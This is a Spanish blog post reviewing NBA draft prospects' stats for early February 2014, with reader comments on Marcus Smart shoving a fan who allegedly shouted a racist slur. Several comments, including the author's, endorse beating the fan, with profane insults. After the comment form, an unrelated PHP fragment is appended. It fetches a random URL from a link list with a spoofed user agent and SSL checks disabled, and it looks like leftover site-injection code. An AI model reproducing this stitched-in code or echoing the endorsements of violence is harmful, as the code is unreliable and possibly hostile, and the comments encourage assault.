Seguimiento del Draft 2014: Semana del 1 al 7 de Febrero

08 de February de 2014 por Viva_Dirk

Ya os avisamos la semana pasada de que el sábado venía cargadito de partidos y que sería una muy buena oportunidad para ver en acción a muchos de los jugadores que pelean por estar en el TOP-10 del próximo draft. Destacaba sobre el resto el Duke-Syracuse que no defraudó a nadie en cuanto a emoción porque acabó decidiéndose a favor de los Orange en la prórroga aunque con un arbitraje algo polémico. El alero de Syracuse, Jerami Grant (posible TOP-2o) anotó 24 puntos (su máximo en la universidad) y además capturó 12 rebotes. Su compañero Tyler Ennis acabó con 14 puntos y 9 asistencias y ya está situado en el top10 de algunos mocks. Tiene enamorado a más de un GM. En Duke,  Jabari Parker acabó fuera por faltas tras 26 minutos de juego pero le dio tiempo a anotar 15 puntos y coger 9 rebotes. Rodney Hood anotó 14 puntos y el escolta Rasheed Sulaimon 16 y además repartió 6 asistencias.

Kansas perdió con claridad ante Texas en un desastroso partido de Andrew Wiggins que anotó sólo 7 puntos con un 2 de 12 en tiros y acabó fuera por faltas. Embiid estuvo algo mejor con un 8-10, pero el hombre más destacados de los Jayhawks fue Wayne Selden con 21 puntos. Por parte Texas, el base freshman Isaiah Taylor anotó 23 puntos. Marcus Smart firmó un completo 15-6-7 aunque con un 3 de 14 en tiros y 4 pérdidas en la derrota de Oklahoma St en casa frente a Baylor. Su compañero de nombre molón, Le’Bryan Nash anotó 19 puntos y cogió 6 rebotes. Corey Jefferson, power-forward de los Bears que suena para la 2ª ronda, acabó con un 11-13. En cambio, Isaiah Austin, que a principio de temporada se le consideraba posible TOP-10, no jugó un buen partido y ya le dan 2ª ronda pero para el 2015. 

Por su parte, Kentucky ganó a Missouri con un 18-9-3 de Julius Randle, 20 puntos de James Young y 21 de un Aaron Harrison que empieza a arrancar. Vaya trío. El sophomore Alex Poythress se quedó en 7 puntos. Frente a ellos los jugadores de 2ª ronda Jabari Brown y Jordan Clarkson vendieron cara su piel con 33 y 28 puntos, respectivamente. Gary Harris anotó 20 puntos en la derrota de los Spartans en Georgetown. También perdió Arizona que vio de este modo truncada su racha triunfal en California. Aaron Gordon acabó con 8-13-6 y un 4 de 14 en tiros.  En cambio, Sam Dekker jugó un mal partido y acabó con  solo 4 puntos en la derrota de Wisconsin ante la Ohio State de Aaron Craft y LaQuinton Ross, ambos posible jugadores de 2ª ronda. Montrezl Harrell acabó con un 14-7 en la victoria de Louisville pero el mejor fue Russ Smith que anotó 27 puntos. TJ Warren hizo 21-8 en la derrota de NC State frente a North Carolina en un partido en el que James McAdoo (posible 2ª ronda del 2015) hizo 16-13-4 aunque con una mala serie de tiro. Dwight Powell se salió con un 28-5-5 en la victoria de Stanford, en frente los 24 puntos del base Jahii Carson no fueron suficiente. Semaj Christon no pudo evitar la derrota de Xavier a pesar de sus 21 puntos y 6 asistencias. Otro que hizo un gran partido para perder fue CJ Wilcox que acabó con 24 puntos en la derrota de los capitalinos.

El domingo los Hoosiers ganaron a los Wolverines con un 10-12 de Noah Vonleh y 27 puntos de Yogi Ferrell. Mal partido en cambio de Nik Stauskas y Glenn Robinson. El pívot AJ Hammons (que lucha por entrar en los puestos finales de la 1ª ronda) hizo un 18-12 en la derrota de Purdue. UCLA perdió pese a los 18 puntos y 9 rebotes de Kyle Anderson. Mucho tuvo que ver el pésimo partido de Zach LaVine que acabó con 6 puntos, 4 pérdidas y 1 de 7 en tiros de campo.

El lunes, en la victoria de Syracuse todo el protagonismo fue para Trevor Conney que se fue hasta los 33 puntos con un tremendo 9 de 12 en triples. Discreto partido en cambio por parte de Ennis y Grant. Villanova arrasó a Xavier y de nada sirvieron los 17 puntos del base Semaj Christon proyectado en 2ª ronda. Después de 3 prórrogas Iowa St ganó a Oklahoma St con un imperial DeAndre Kane con un 26-9-9, Marcus Smart hizo un 20-7-3 y su compañero LeBryan Nash 26-10-5.

El martes Kansas ganó con un partido muy completo de Andrew Wiggins, 14-7-5, 3 robos, 2 tapones y 4 de 13 en tiros. Últimamente Wiggins está asumiendo más tiros, algo muy positivo. Joel Embiid solo disputó 17 minutos y se quedó en 5 puntos y 7 rebotes. Mejor ni mencionar el partido de Wayne Selden. Por parte de Baylor, 14 puntos de Corey Jefferson y 6 puntos, 6 rebotes, 3 tapone para Isaiah Austin. Victoria también relajada de Kentucky con Willie Cauley-Stein como mejor hombre con 18 puntos, 11 rebotes y 6 tapones. Randle hizo 12 puntos, Aaron Harrison, 16 y James Young y Alex Poythress, 10. Jabari Parker lideró a Duke a la victoria con una actuación fenomenal: 21 puntos, 8 rebotes, 2 tapones, 2 robos y un 8 de 10 en tiros. Flojo partido, en cambio, de Rodney Hood. Debutó por fin Chris Walker con los Gators. En  7 minutos anotó 4 puntos, cogió 2 rebotes y puso 2 tapones. Frente a él Jabari Brown hizo 15 puntos y 6 asistencias.

El miércoles Michigan ganó con 23 puntos de Glenn Robinson y un 9-5-8 de Nick Stauskas. Pittsburgh ganó en la prórroga gracias a Lamar Patterson que se fue hasta los 25 puntos. La pareja formada por Montrezl Harrell y Russ Smith anotó 15 y 17 puntos respectivamente en la victoria de Louisville. Purdue ganó gracias a otro gran partido de AJ Hammons: 20-14 y 6 tapones que a buen seguro le servirán para llamar la atención y subir puestos en los mocks.

El jueves Arizona ganó en un mal partido de Aaron Gordon que acabó con 6 puntos, 8 rebotes y un escalofriante 2 de 11 en tiros libres. También victoria de los Spartans a pesar del flojo partido de su estrella, Gary Harris que metió 14 puntos aunque con un 5 de 16 en tiros. Volvió a la acción Andreian Payne con 12 puntos. La actuación de la jornada y casi de la semana son los 26-12-6 de Sean Kilpatrick en la victoria de Cincinnati. Tampoco están nada mal los 23-6-6 de Jahii Carson en la victoria de Arizona St. Tremenda semana para el base. A CJ Wilcox no le sirvieron sus 20 puntos y Washington perdió de nuevo, esta vez en Utah.

El viernes sirvió para que Doug McDermott se exhibiera de nuevo:  32 puntos, 9 rebotes y un 13 de 14 en tiros libres. Creighton se llevó el partido.

En el apartado internacional Darío Saric se mantiene al borde del top10 en los mocks y no sería de extrañar que subiera viendo como está jugando últimamente. Ante el Partizan (equipo de Euroliga, no lo olvidemos) se fue hasta 22 puntos, 12 rebotes y 3 asistencias que les sirvieron para ganar el partido. En los últimos 5 encuentros promedia 20.8 puntos y 10.4 rebotes con más de un 50% en tiros. Frente a él, Bogdan Bogdanovic también respondió con un partidazo de 32 puntos, 4 rebotes y 5 asistencias. Vasilije Micic hizo un 13-6-4 aunque acompañado de 8 pérdidas en la derrota del Mega Vizura. A Jusuf Nurkic en tan solo 17 minutos de juego le dio tiempo a anotar 14 puntos y capturar 7 rebotes en la victoria de Cedevita. El center francés Clint Capela sube en los mocks hasta puestos cercanos a la lotería y es que su último partido fue una exhibición con 21 puntos, 9 rebotes, 7 asistencias y 6 tapones en la victoria de Cholet. Walter Tavares fue el mejor del Gran Canaria en la derrota de copa contra el Real Madrid, con 16 puntos, 12 rebotes y 4 tapones, y en el partido de liga hizo un 6-9-4, lo que le sirve para situarse ya en la zona media de 2ª ronda. Alessandro Gentile ayudó a la victoria de Milano con 14 puntos y muy buenos porcentajes de tiro.

De nuevo hoy sábado menú del bueno. Saltarán a la cancha Wiggins, Embiid, Randle y Smart entre muchos otros. Mejor no perdérselo.

Comenta

8 comentarios a esta entrada

  1. arivas dice:
    #1

    Bueno pues jugaron ayer los top y bastante bien por lo que los numeros indican.

    Embiid ayer 11 puntos 12 rebotes. Se está moviendo en estos numeros, lo cual no parece mucho, pero es que juega poco (muchos problemas de flatas muchas veces) y tira poco solo 6 tiros de media ( no le buscan mucho la verdad) . Uno piensa que el dia que juege mas y tire mas este chico puede hacer numeros con la gorra, de momento no termina de sacar ese partido que impresione estadisticamente hablando. Pero parece claro que condiciones tiene y sigue siendo el 1 en la mayoria de mocks aunque esta semana se ha dicho que esta pensado seriamente quedarse otro año en Kansas.

    WIggins como dice Viva parece que empieza a asumir mas protagonismo, aunque no con mucho acierto. 19 puntos anoche. A mi me sigue dejando algo frio, aunque tiene unas condiciones barbaras.

    Parker la verdad que no falla, ayer su record de anotacion 29 puntos y 16 rebotes contra Boston, con Ainge siguiendolo en directo.

    Smart 22 puntos y Randle 16-7… siguen fuertes (y nunca mejor dicho, vaya dos animalitos)

      Citar

  2. Ruxixon dice:
    #2

    Está en todos lados el incidente de Marcus Smart con un aficionado al cual empujó.Al parecer éste le dijo “vuélvete a África,negro” cuando Smart estaba en el suelo.No se justifica de todas formas.

      Citar

  3. Sancho88 dice:
    #3

    Lo que no se justifica es el puto racismo americano… da asco. Smart le tendría que haber pegado pero de verdad, al puto blanquito que se cree superior. Encima le caen 3 partidos a Smart y este hijo de puta saldrá inmune, que además dicen que es el aficionado número 1 de Texas Tech. Pues menudo ejemplo, menudo modelo, y menudo impresentable. Mi apoyo es para Marcus Smart completamente, y sí está justificado lo que hizo. Basta ya de racismo en este mundo

      Citar

  4. Sancho88 dice:
    #4

    Me pongo en su piel y me darían ganas de arrancarle la puta cabeza. Ahora empezarán a decir que Smart es un tío muy chungo, que no es fiable, que patatín patatán. Vamos a juzgarle por lo que hace, por su juego que se adapta perfectamente al estilo NBA, y está claro que el equipo que lo pesque en el draft se hace con un jugador de oro. Y lo que ha hecho me parece un acto de respeto hacia sí mismo y hacia toda la raza negra en general. Si yo fuera negro estaría muy orgulloso de ese negro, no como Jabari Brown, que al parecer le echa la bronca… venga ya Brown… Me declaro muy fan de MARCUS SMART después de esto. Sí señor

      Citar

  5. Sancho88 dice:
    #5

    Markel Brown, que diga. Bueno, picha floja Brown, gilipoyas Brown. Defiende a tu compañero, inútil. La NCAA debería darle verguenza sancionar al chaval, encima que el que ha sufrido la agresión ha sido él

      Citar

  6. txusma dice:
    #6

    El señor se llama Jeff Orr y parece que lo conocen en todas partes. Se pasa el partido gritando e insultando a los rivales.
    Ha escrito una carta disculpándose e informando que este año no volverá a asistir a ningún partido de su equipo.

    En este tipo de sanciones siempre he pensado q se ceba mucho con el jugador pero poco con el aficioando. En el caso de los profesionales siempre decimos aquello de “se les paga para que aguanten” (q no estoy del todo de acuerdo) pero y en este caso? Hablamos de un chaval de 20 años q no cobra por jugar a baloncesto. Han de aguantar según q tipos de insultos?

      Citar

  7. rumbero dice:
    #7

    La señora del dedo da un ascazo importante también.

      Citar

  8. Viva_Dirk dice:
    #8

    No tengo dudas de que si soy Smart el tío acaba en el hospital o muy cerca porque de un par de puñetazos no baja la cosa.

    Respecto a que debe hacer un jugador en esos casos, cada uno puede hacer lo que quiera que para eso son mayorcitos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>